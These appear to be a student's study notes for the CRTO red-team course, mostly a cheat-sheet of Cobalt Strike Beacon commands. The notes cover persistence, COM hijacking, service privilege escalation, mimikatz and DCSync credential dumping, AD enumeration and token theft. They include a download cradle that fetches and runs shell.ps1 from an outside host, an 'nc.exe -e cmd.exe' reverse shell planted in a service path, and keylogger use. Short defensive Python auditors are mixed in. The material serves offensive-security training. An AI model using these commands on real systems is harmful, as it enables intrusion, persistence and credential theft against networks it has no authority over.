
Cobalt Strike

These are temporary notes while I finished the course, then I moved to

How to set up the Team Server

#Start the teamserver and run as service
Intrusionz3r0@htb[/crto]$ tmux
Intrusionz3r0@htb[/crto]$ cd cobaltstrike
Intrusionz3r0@htb[/crto]$ sudo ./teamserver <Attacker-Box> <Password-TeamServer> c2-profiles/normal/webbug.profile

Launch the Cobalt Strike client from the taskbar and enter the following details:

#Set parameters:
Alias: Kali-Intrusionz3r0
Host: <Attacker-Box>
Port: Default port
Username: Intrusionz3r0
Password: <Password-TeamServer>

Running the team server as a service so it starts automatically

Intrusionz3r0@htb[/crto]$ ip a
Intrusionz3r0@htb[/crto]$ sudo nano /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target
Intrusionz3r0@htb[/crto]$ sudo systemctl daemon-reload
Intrusionz3r0@htb[/crto]$ sudo systemctl start teamserver.service
Intrusionz3r0@htb[/crto]$ sudo systemctl enable teamserver.service
Intrusionz3r0@htb[/crto]$ sudo systemctl status teamserver.service

Setting up DNS records for DNS-based Beacon payloads

Cobalt Strike Functionalities

Listeners

There are two main types of listeners:

  1. Egress Listeners: These let Beacons talk to the team server from outside the target network, e.g. over the internet. The most common types are:

    • HTTP/S: Beacons communicate using web traffic (like visiting a website).

    • DNS: Beacons hide their messages in DNS requests (like asking for a website's address).

  2. Peer-to-Peer Listeners: These are for communication inside the same network, where Beacons talk to each other instead of calling the team server directly.

How to Set Up a Listener:

  • Click Add (bottom bar), choose Beacon HTTP/DNS/TCP/SMB, and give it a name (something easy to remember).

  • Add the server's IP or domain name, e.g. nickelviper.com

Setting up the SMB Listener

  • The default pipe name is well signatured. A good strategy is to emulate names known to be used by common applications or Windows itself. List the existing pipes:

PS C:\> ls \\.\pipe\
  • Select one, for example: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57

  • Change the final 4 characters: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24aAAAA

When creating the listener, specify this name in the Pipename (C2) field.

Pivot Listeners

Pivot Listeners are an advanced Cobalt Strike feature that lets you use an already compromised Beacon as a "bridge" to reach other internal systems in a network.

Pivot listeners can only be created from an existing Beacon:

  1. Right-click the Beacon

  2. Click on Pivoting

    1. Listener

      1. Set a name

      2. Set the payload

      3. Host is set by default

      4. Set the port, e.g. 1234

      5. Session is set by default

Verify on the host that the pivot listener is bound:

PS C:\> netstat -anop tcp | findstr 1234

Set up a Script web delivery

  1. Attacks > Scripted Web Delivery (S)

    1. Set URI Path

    2. Set Host (nickelviper.com)

    3. Set Port

    4. Set Listener

    5. Set type

    6. Enable Use X64 Payload

      1. Copy the payload

Hosting a file

  1. Site Management > Host file

    1. Select the file

    2. Set the Local URI

    3. Set Host

    4. Set Port

    5. Set mime type (Default: Automatic)

Interact with local binaries

beacon> execute-assembly c:\path\binary.exe
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Cobalt Strike useful commands

The longer the sleep, the healthier the Beacon: it checks in less often, so there is less traffic to detect.

#Show help menu
beacon> help 
beacon> help sleep 
#Modify sleep communication time
beacon> sleep 5 
beacon> sleep 0 #Interactive mode (real time)

#Connect to a Beacon's bind TCP listener
beacon> connect [localhost|ip|hostname] PORT

# Import a PowerShell module
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# Execute from local binary
beacon> execute-assembly <binary-path> <params>

# ========================
# User Impersonation  
# ========================

#Retrieves the user ID of the current process running the Beacon
beacon> getuid

#Performing Pass the hash 
beacon> pth DOMAIN\username hash

# Steal access token from another process
beacon> steal_token <PID>

#Make a token to impersonate user using plaintext credentials
beacon> make_token DEV\jking <Password>

#Allows you to inject any arbitrary shellcode from .bin files
beacon> shinject <PID> <x86|x64> /path/to/binary.bin

#Inject a full Beacon payload for the specified listener
beacon> inject 4464 x64 tcp-local

#Steal token and store it
beacon> token-store steal 1234

# List all stored tokens
beacon> token-store show

# Impersonating a Stored Token
beacon> token-store use <id>

# Removing a Single Token or Purge all tokens
beacon> token-store remove <id>
beacon> token-store remove-all

# Drop the impersonation (Revert to ourself)
beacon> rev2self

Notes for CRTO

Initial Reconnaissance

Identify the security solutions in place on the system by looking for their processes.

EDR / AV

  • CrowdStrike Falcon: csagent.exe, CSFalconService.exe

  • Microsoft Defender: MsMpEng.exe, MSASCui.exe

  • Elastic Security: elastic-agent.exe, elastic-endpoint.exe

  • Carbon Black: cb.exe, CbDefense.exe

  • SentinelOne: SentinelAgent.exe

  • CylancePROTECT: CylanceSvc.exe

  • Symantec: ccSvcHst.exe, Rtvscan.exe

  • Trend Micro: TmCCSF.exe

  • Kaspersky: avp.exe

SIEM

  • Splunk: splunkd.exe

  • IBM QRadar: qradar.exe

  • Tanium: TaniumClient.exe

Other tools

  • Sysmon: sysmon.exe

  • Osquery: osqueryd.exe

  • Wazuh: wazuh-agent.exe

# List the processes running on the system
beacon> ps

#Enumerate users that are currently logged on the machine.
beacon> net logons

# Collect information about security configuration
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

#Take screenshots (View > Screenshots)
beacon> printscreen
beacon> screenshot
beacon> screenwatch

#Enable keylogger.
beacon> keylogger
beacon> jobs
beacon> jobkill 6

#Copy data from clipboard
beacon> clipboard

Host Persistence

#Powershell paths
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell

# Encode Payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/shell.ps1"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Encode Payload on Linux 
Intrusionz3r0@htb[/crto]$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://nickelviper.com/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0;echo

#Execute command
PS C:\> powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

#Task Scheduler (Create scheduled tasks that execute payloads at specific triggers (logon, hourly, boot, etc.).)
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "ARGUMENT" -n "NAME" -m add/remove/check/list -o hourly
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "ARGUMENT" -n "NAME" -m add/remove/check/list -o logon

#Startup Folder (Place an executable/script in the user's Startup folder to execute at login.)
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAKABOAG<SNIP>" -f "Filenameoutput" -m add

# Registry Autorun (Modify Registry keys (HKCU or HKLM) to auto-run payloads at user logon or system startup.)
beacon> cd C:\Windows\System32\spool\drivers\color
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe Timer.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\Windows\System32\spool\drivers\color\Timer.exe" -a "/q /n" -k "hkcurun" -v "Timer" -m add

# Windows Service (Create or modify a Windows service to execute your payload, typically set to start automatically.)
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

# WMI event subscription (Register a WMI event that triggers a payload on a specific action, e.g. when notepad.exe starts.)
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
#Obtain information about the WMI event
beacon> powershell Get-WmiEvent -Name WmiBackdoor
#Remove the WMI event
beacon> powershell Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject
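
The `-enc` payloads above are UTF-16LE text encoded as base64, so a defender reviewing process-creation logs can reverse them. As an added example (not from the page or any of the tools it uses), this Python decodes `-EncodedCommand` arguments from sample command lines and flags download-cradle markers; the command lines and the `nickelviper.com` payload are constructed from the page's own encoding step.

```python
import base64

# Strings that typically indicate a download cradle once the command is decoded.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                  "invoke-webrequest", "downloadfile")


def encode_powershell(command: str) -> str:
    """Mirror the page's encoding: UTF-16LE bytes of the script, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def is_encoded_flag(token: str) -> bool:
    """True for -EncodedCommand and the prefixes PowerShell accepts (-e, -ec, -enc, ...)."""
    if not token or token[0] not in "-/":
        return False
    flag = token[1:].lower()
    if flag == "ec":                      # documented short alias
        return True
    return flag.startswith("e") and "encodedcommand".startswith(flag)


def decode_encoded_command(cmdline: str):
    """Return the decoded script carried by -EncodedCommand, or None if absent/invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
                return None
    return None


def classify(cmdline: str) -> dict:
    """Decode the command line (if encoded) and flag download-cradle markers."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"encoded": False, "decoded": None, "cradle": False}
    low = decoded.lower()
    return {"encoded": True, "decoded": decoded,
            "cradle": any(marker in low for marker in CRADLE_MARKERS)}


# Constructed sample command lines (as a process-creation log would record them).
SAMPLE_PAYLOAD = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/shell.ps1"))'
SAMPLE_COMMAND_LINES = [
    "powershell -nop -enc " + encode_powershell(SAMPLE_PAYLOAD),
    "powershell.exe -nop -w hidden -e " + encode_powershell("Get-Service | Where-Object Status -eq Running"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]


def scan(cmdlines):
    """Return (cmdline, decoded) pairs for every encoded command that looks like a cradle."""
    hits = []
    for line in cmdlines:
        result = classify(line)
        if result["cradle"]:
            hits.append((line, result["decoded"]))
    return hits


if __name__ == "__main__":
    for line, decoded in scan(SAMPLE_COMMAND_LINES):
        print("download cradle:", decoded)
```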

Hijacking COM objects

Use Process Monitor with filters on the target process, and look for a process that loads a .dll or .exe through a COM object; take note of its CLSID.

#Check whether the CLSID exists in HKLM and/or HKCU.
PS C:\> Get-Item -Path "HKLM:\Software\Classes\CLSID\{ID}\InprocServer32"
PS C:\> Get-Item -Path "HKCU:\Software\Classes\CLSID\{ID}\InprocServer32"

#Hijacking COM object
PS C:\> New-Item -Path "HKCU:\Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}"
PS C:\> New-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}" -Name "InprocServer32" -Value "C:\PATH\http_x64.dll"
PS C:\> New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

#Get the object
PS C:\> Get-ChildItem -Path "Registry::HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}"

Script to find scheduled tasks that use a CLSID with PowerShell

# Enumerate scheduled tasks whose action is a COM handler (ClassId), that have an enabled trigger
# and that run as the Users group: these are the CLSIDs worth checking in HKLM/HKCU above.
$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
    if ($null -ne $Task.Actions.ClassId)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            if ($Task.Principal.GroupId -eq "Users")
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}

Host Privilege Escalation

For privilege escalation it is recommended to use TCP Beacons bound to localhost only.

Privilege escalation via Unquoted Service Path

Requirements:

  1. A service with an unquoted service path that contains spaces

  2. Write permission on one of the directories in that path for a low-privileged principal (e.g. BUILTIN\Users)

# Enumerate Services installed on server
beacon> run wmic service get name, pathname
beacon> run sc query
beacon> run sc qc VulnService1
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> powershell Get-Service | fl
beacon> powershell Stop-Service -Name 'IObitUnSvr'
beacon> powershell Start-Service -Name 'IObitUnSvr'
beacon> powershell Restart-Service -Name 'IObitUnSvr'

#Modify the service binary path (ImagePath / binPath)
beacon> powershell Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe 10.10.10.205 443"
beacon> run sc config <ServiceName> binpath= "COMMAND-HERE"

#Reboot the machine
beacon> run shutdown -r -t 0

#Enumerate the system
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit
#Enumerate ModifiableServices
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe ModifiableServices

#Enumerate ACLs
beacon> run icacls "C:\PATH"
beacon> powershell Get-Acl -Path "C:\PATH" | fl

#Exploitation with write permission on the service folder
beacon> cd C:\Program Files\Vulnerable Services
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe Service.exe
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> connect localhost 4444

#Exploitation with permission to modify the binPath
beacon> run sc qc VulnService2
beacon> run sc config VulnService2 binPath= C:\Windows\System32\spool\drivers\color\evil.exe
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444

#Exploitation via weak binary permissions
#    Check the ACLs of the service and its binary for Modify permissions
beacon> powershell-import Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access
#    Overwrite the binary with the payload
beacon> upload Service 3.exe
beacon> run sc start VulnService3
beacon> connect localhost 4444
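
As an added example, not part of the page or of SharpUp, this Python audits `wmic service get name,pathname` output for the unquoted-path condition above, lists the paths the service control manager would try before the real one (so the directories whose write ACLs need review with icacls or Get-Acl), and produces the `sc config` command that quotes the path. The service list is constructed, with `VulnService1`/`VulnService2` named as on the page.

```python
import ntpath

# Constructed sample of `wmic service get name,pathname` output (fixed-width columns).
SAMPLE_WMIC_OUTPUT = """\
Name          PathName
Spooler       C:\\Windows\\System32\\spoolsv.exe
VulnService1  C:\\Program Files\\Vulnerable Services\\Service 1.exe
VulnService2  "C:\\Program Files\\Vulnerable Services\\Service 2.exe"
AcmeAgent     C:\\Program Files\\Acme Agent\\agent.exe -k monitor
"""


def parse_wmic_services(output: str):
    """Yield (name, pathname) from fixed-width wmic output using the header offset."""
    lines = [ln.rstrip() for ln in output.splitlines() if ln.strip()]
    header = lines[0]
    offset = header.index("PathName")
    for line in lines[1:]:
        yield line[:offset].strip(), line[offset:].strip()


def split_executable(pathname: str):
    """For an unquoted path, split it into (executable, arguments) at the first '.exe'."""
    idx = pathname.lower().find(".exe")
    exe = pathname.split()[0] if idx == -1 else pathname[: idx + 4]
    return exe, pathname[len(exe):]


def lookup_candidates(exe: str):
    """Paths the service control manager tries before the real one when the path is
    unquoted and contains spaces: each space-delimited prefix, with .exe appended."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_fix(name: str, exe: str, args: str) -> str:
    """The sc command that remediates the finding by quoting the executable path."""
    return f'sc config {name} binPath= "\\"{exe}\\"{args}"'


def audit_wmic_output(output: str):
    """Return one finding per unquoted service path that contains spaces."""
    findings = []
    for name, pathname in parse_wmic_services(output):
        if not pathname or pathname.startswith('"'):
            continue                      # quoted paths are safe
        exe, args = split_executable(pathname)
        if " " not in exe:
            continue                      # no spaces: nothing for the SCM to misinterpret
        candidates = lookup_candidates(exe)
        findings.append({
            "name": name,
            "exe": exe,
            "candidates": candidates,
            # Directories whose write ACLs must be reviewed (icacls / Get-Acl as above).
            "check_dirs": [ntpath.dirname(c) for c in candidates],
            "fix": quoted_fix(name, exe, args),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_wmic_output(SAMPLE_WMIC_OUTPUT):
        print(finding["name"], "->", finding["fix"])
```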

UAC Bypass

beacon> elevate uac-schtasks tcp-local
beacon> run netstat -anop tcp
beacon> connect localhost <PORT>

Credential Theft

Modifiers for the mimikatz command: `!` runs the command as SYSTEM, `@` runs it with Beacon's current token.

#Dump credentials/hashes from LSASS.exe
beacon> mimikatz !sekurlsa::logonpasswords

#Dump the Kerberos encryption keys of currently logged-on users
beacon> mimikatz !sekurlsa::ekeys

#Dump SAM database
beacon> mimikatz !lsadump::sam

#Dump domain cached credentials (DCC) - Not NTLM
beacon> mimikatz !lsadump::cache

# Dump TGT/TGS Tickets
beacon> mimikatz !sekurlsa::tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

# DCSync Attack
beacon> make_token DEV\username password
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
beacon> mimikatz !lsadump::dcsync /all /domain:dev.cyberbotic.io

Domain Reconnaissance

# =============================================
# LOAD POWERVIEW INTO COBALT STRIKE SESSION
# =============================================
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# ========================
# BASIC DOMAIN ENUMERATION  
# ========================
beacon> powerpick Get-Domain -Domain <domain>  # Retrieve domain information
beacon> powerpick Get-DomainSID  # Get domain security identifier
beacon> powerpick Get-DomainController | select Forest, Name, OSVersion | fl  # List domain controllers
beacon> powerpick Get-ForestDomain -Forest <forest>  # Get forest information
beacon> powerpick Get-DomainPolicyData | select -expand SystemAccess  # View domain password policies

# ===========================
# USER ACCOUNT ENUMERATION
# ===========================
beacon> powerpick Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl  # Get specific user details
beacon> powerpick Get-DomainUser | select cn,serviceprincipalname  # Find all users with SPNs (Kerberoasting)
beacon> powerpick Get-DomainUser -PreauthNotRequired  # Find AS-REP roastable accounts
beacon> powerpick Get-DomainUser -TrustedToAuth  # Find user accounts configured for constrained delegation (TRUSTED_TO_AUTH_FOR_DELEGATION)

# =============================
# COMPUTER ACCOUNT ENUMERATION
# =============================
beacon> powerpick Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName  # List all domain computers
beacon> powerpick Get-DomainComputer -Unconstrained | select cn, dnshostname  # Find computers with unconstrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select cn, msdsallowedtodelegateto  # Find computers with constrained delegation

# ========================
# DOMAIN STRUCTURE
# ========================
beacon> powerpick Get-DomainOU -Properties Name | sort -Property Name  # List all Organizational Units
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName  # Find computers in specific OU

# ========================
# GROUP ENUMERATION
# ========================
beacon> powerpick Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName  # Find administrative groups
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName  # List Domain Admins members
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName  # Recursively list all members

# ========================
# GROUP POLICY (GPO) ENUMERATION
# ========================
beacon> powerpick Get-DomainGPO -Properties DisplayName | sort -Property DisplayName  # List all GPOs
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName  # Find OUs linked to specific GPO
beacon> powerpick Get-DomainGPOLocalGroup | select GPODisplayName, GroupName  # Find local groups defined in GPOs
beacon> powerpick Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl  # Find users with local admin via GPO

# ========================
# DOMAIN TRUSTS AND ACLS
# ========================
beacon> powerpick Get-DomainTrust  # Enumerate domain trusts
beacon> powerpick Find-InterestingDomainAcl -ResolveGUIDs  # Find interesting access control entries

# =================================
# LATERAL MOVEMENT TECHNIQUES
# =================================
beacon> powerpick Find-LocalAdminAccess -Verbose  # Find systems where current user has admin rights
beacon> powerpick Invoke-CheckLocalAdminAccess -ComputerName <server_fqdn>  # Check admin access on specific system
beacon> powerpick Find-PSRemotingLocalAdminAccess -ComputerName <server_fqdn>  # Check PowerShell Remoting access
beacon> powerpick Find-WMILocalAdminAccess -ComputerName <server_fqdn>  # Check WMI access

# =================================
# USER SESSION HUNTING
# =================================
beacon> powerpick Find-DomainUserLocation -Verbose  # Find where users are logged in
beacon> powerpick Find-DomainUserLocation -UserGroupIdentity "Domain Users"  # Find sessions by group
beacon> powerpick Invoke-UserHunter -CheckAccess  # Hunt users + verify admin access
beacon> powerpick Find-DomainUserLocation -CheckAccess  # Alternative method
beacon> powerpick Find-DomainUserLocation -Stealth  # Stealthy approach (focus on fileservers)
beacon> powerpick Invoke-StealthUserHunter  # Enhanced version

# =================================
# ADVANCED HUNTING TECHNIQUES
# =================================
beacon> powerpick Invoke-ProcessHunter  # Hunt for specific processes
beacon> powerpick Invoke-UserEventHunter  # Search DC event logs for logon events

# =================================
# SHARE AND FILE ENUMERATION
# =================================
beacon> powerpick Invoke-ShareFinder -Verbose  # Find network shares
beacon> powerpick Invoke-FileFinder -Verbose  # Search for sensitive files
beacon> powerpick Get-NetFileServer  # List all fileservers in domain


# =================================
# Domain enumeration using SharpView
# =================================
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain

# =================================
# Domain enumeration using ADSearch
# =================================

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins*))"

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member

# Kerberoastable users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# AS-REP roastable users (DONT_REQ_PREAUTH)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# Unconstrained Delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# Constrained Delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# Additionally, the `--json` parameter can be used to format the output in JSON
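
As an added illustration (not from the page or from ADSearch), this Python replays the four ADSearch filters above against a constructed directory export and decodes the userAccountControl bit values behind the `:1.2.840.113556.1.4.803:=` (bitwise AND) matching rule, which is how a defender can audit the same conditions from a directory dump. The account names and `*.dev.example.local` hosts are constructed.

```python
# userAccountControl bit flags relevant to the queries above (the page's filters use
# 4194304 = DONT_REQ_PREAUTH and 524288 = TRUSTED_FOR_DELEGATION).
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000          # 4194304 in the AS-REP roast filter
TRUSTED_FOR_DELEGATION = 0x80000     # 524288 in the unconstrained delegation filter


def decode_uac(value: int):
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def ldap_bit_and(value: int, mask: int) -> bool:
    """Semantics of the 1.2.840.113556.1.4.803 matching rule: every bit of mask is set."""
    return value & mask == mask


# Constructed directory export (what ADSearch would return for the attributes used above).
SAMPLE_DIRECTORY = [
    {"sAMAccountName": "jking", "objectCategory": "user", "userAccountControl": 512,
     "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql", "objectCategory": "user", "userAccountControl": 66048,
     "servicePrincipalName": ["MSSQLSvc/sql01.dev.example.local:1433"]},
    {"sAMAccountName": "legacy_app", "objectCategory": "user", "userAccountControl": 4194816,
     "servicePrincipalName": []},
    {"sAMAccountName": "DC01$", "objectCategory": "computer", "userAccountControl": 532480},
    {"sAMAccountName": "WEB01$", "objectCategory": "computer", "userAccountControl": 16781312,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.dev.example.local"]},
    {"sAMAccountName": "WKS01$", "objectCategory": "computer", "userAccountControl": 4096},
]


def audit(objects):
    """Apply the four ADSearch filters from the page to an in-memory export."""
    users = [o for o in objects if o["objectCategory"] == "user"]
    computers = [o for o in objects if o["objectCategory"] == "computer"]

    def names(matches):
        return [o["sAMAccountName"] for o in matches]

    return {
        # (&(objectCategory=user)(servicePrincipalName=*))
        "kerberoastable": names(u for u in users if u.get("servicePrincipalName")),
        # (&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
        "asrep_roastable": names(u for u in users
                                 if ldap_bit_and(u["userAccountControl"], DONT_REQ_PREAUTH)),
        # (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))
        # Domain controllers are expected here; any other host is a finding to review.
        "unconstrained": names(c for c in computers
                               if ldap_bit_and(c["userAccountControl"], TRUSTED_FOR_DELEGATION)),
        # (&(objectCategory=computer)(msds-allowedtodelegateto=*))
        "constrained": names(c for c in computers if c.get("msDS-AllowedToDelegateTo")),
    }


if __name__ == "__main__":
    for category, accounts in audit(SAMPLE_DIRECTORY).items():
        print(f"{category}: {accounts}")
```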

User impersonation

Pass the hash

#Retrieves the user ID of the current process running the Beacon
beacon> getuid

#Performing Pass the hash 
beacon> pth DOMAIN\username hash

#Drop impersonation
beacon> rev2self

Stealing tokens

Allows you to steal the token from another process

# Steal access token from another process
beacon> steal_token <PID>

# Drop the impersonation (Revert to ourself)
beacon> rev2self

Token store

Improved version of steal_token

#Steal token and store it
beacon> token-store steal 1234

# List all stored tokens
beacon> token-store show

# Impersonating a Stored Token
beacon> token-store use <id>

# Removing a Single Token or Purge all tokens
beacon> token-store remove <id>
beacon> token-store remove-all

# Drop the impersonation (Revert to ourself)
beacon> rev2self

Making tokens

Allows you to impersonate a user if you know their plaintext password.

#Make a token to impersonate user using plaintext credentials
beacon> make_token DEV\jking <Password>

Injecting arbitrary shellcode into a process

#Allows you to inject any arbitrary shellcode from .bin files
beacon> shinject <PID> <x86|x64> /path/to/binary.bin
#Inject a full Beacon payload for the specified listener
beacon> inject 4464 x64 tcp-local

# =================================
# Pass the ticket using rubeus
# =================================

#Create a sacrificial process (request the TGT first with Rubeus asktgt, see OverPassTheHash below)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[+] LUID 0x798c2c
[+] ProcessID 4748

#Inject the ticket into logon session 0x798c2c
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP

# Impersonate process created with rubeus.exe
beacon> steal_token 4748

#Drop impersonation and kill process
beacon> rev2self
beacon> kill 4748


# =================================
# OverPassTheHash using rubeus
# =================================

# Calculate all hash formats
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local

# Using rc4 NTLM Hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap

# Using aes256 hash (Recommended for better opsec)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec /nowrap

Last updated 20 days ago

Listeners menu: go to Cobalt Strike > Listeners or click the headphone icon.

Links:

  • Tool: SharPersist
  • Aggressor Scripts: persistence-sharpersist
  • Powershell Executable file location: PowerShell_Executables_File_System_Locations.php
  • Powerlurk: PowerLurk
  • Process Monitor: procmon
  • Script to obtain ACLs: Get-ServiceAcl
